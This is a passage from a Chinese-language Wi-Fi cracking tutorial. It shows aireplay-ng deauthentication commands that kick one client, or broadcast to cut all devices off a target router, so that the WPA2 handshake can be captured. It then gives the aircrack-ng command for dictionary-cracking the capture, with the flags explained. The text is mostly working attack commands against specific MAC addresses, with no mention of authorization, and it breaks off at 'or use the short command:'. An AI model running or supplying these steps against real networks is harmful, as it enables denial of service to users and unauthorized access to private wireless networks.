注意：如果当前尚未抓到握手包且 STATION 列表下没有设备，说明没有终端连接在该网络。一旦 STATION 下显示设备，即可进行攻击操作。

攻击设备

使用 aireplay-ng 命令强制设备断开并重连以获取握手包。

获取握手包有两种方法：
1. 被动等待： 等待合法客户端自行重连（时间成本极高）。
2. 主动攻击： 发送解除认证攻击包将其踢下线，设备自动重连时截获握手包。

注：需开启新的终端窗口执行攻击，保持原监听窗口运行。

# 针对特定设备攻击
aireplay-ng -0 10 -a 14:6B:9A:5C:EB:C6 -c 52:33:70:C1:8C:C8 wlan0

# 广播攻击使所有设备断网
aireplay-ng -0 0 -a 14:6B:9A:5C:EB:C6 wlan0 -D

用字典进行破解握手包

使用以下命令结合字典文件进行破解：

aircrack-ng -a2 -b [目标MAC] -w [字典路径] ~/*.cap

参数含义：

• -a2：强制 WPA2 攻击模式
• -b：指定目标路由器的 MAC 地址
• *.cap：捕获的所有 .cap 后缀数据包

或使用简洁指令：